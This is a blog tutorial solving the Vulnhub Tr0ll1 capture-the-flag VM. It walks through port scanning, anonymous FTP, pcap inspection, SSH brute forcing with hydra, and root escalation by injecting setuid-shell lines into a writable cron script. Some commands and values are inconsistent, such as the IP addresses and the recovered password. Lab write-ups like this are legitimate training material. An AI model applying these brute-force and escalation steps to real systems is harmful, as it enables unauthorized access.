Tr0ll 1

TR0LL: 1 CTF Full tutorial | Vulnhub

Introduction

In this post, You will learn how to CTF the Troll1 and it is really very easy to CTF trust me and there is 1 hidden flag and while playing this challenge you should be very fast.

To download Tr0ll1 [Click here]

Aim

There is one hidden flag in tr0ll1 and we should capture it.

Tr0ll 1 Hacking Phases

Finding target Ip

To find the target IP, I just ran the arp-scan -l command.

sudo arp-scan -l

Nmap scan

nmap -A 192.168.1.2

Port 21 and 22, 80 are open and for port 21 is FTP the anonymous login is allowed.

Target website

Since port 80 is open I wanted to see the website so, I just entered the target Ip in the browser.

http://192.168.1.2

FTP login

The FTP port 21 is open and also we know the username and password for port 21 let’s do a login.

username: anonymous
password: anonymous

To log in just enter the below commands.

ftp 192.168.1.2
ls -al
get lol.pcap

I have found a pcap file so just did get lol.pcap to get that file.

Viewing lol.pcap in wireshark

To view the file lol.pcap, Just enter ????????

wireshark lol.pcap

Once you are inside open the first packet in tcp stream like this ????????

Then I opened the TCP stream 2 and I found this.

It says that you almost found it “sup3rs3cr3tdirlol”.

So, I went to that URL

http://192.168.1.2/sup3rs3cr3tdirlol

Over there I found roflmao and I just downloaded that and then I just did strings roflmao

Then I have found that ‘Find the address 0x0856BF to proceed’ so, I went that wensite like this.

http://192.168.1.2/0x0856BF

Exploring 0x0856BF

http://192.168.1.2/0x0856BF

Found two files here.

The second file doesn’t contain anything and the good_luck file has the username so just copy those names and save them in a file.

Brute forcing

We are going to use hydra to brute force.

hydra -L dict.txt -P Passe.txt 192.168.1.102 ssh

The dict.txt contains usernames and Passe.txt has the passwords.

Found the username and password they are.

username: overflow
password: Pass.txt

Connecting to target

We are going to connect to the target using ssh

ssh overflow@192.168.1.2

Enter the username and password.

No find the directories just enter????????

find / -writable 2<dev/null

Now let’s go to the /lib/log/cleaner.py

cd /lib/log
nano cleaner.py

Now add these into the file to get the root access.

os.system('cp /bin/sh /tmp/sh')
os.system('chmod u+s /tmp/sh')

Once you added it should look something like this.

Just save it.

Getting the root

We are just executing the files in /tmp directory.

cd /tmp
ls
./sh
cd /root
ls
cat proof.txt

Finally done.

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site

 

Scroll to Top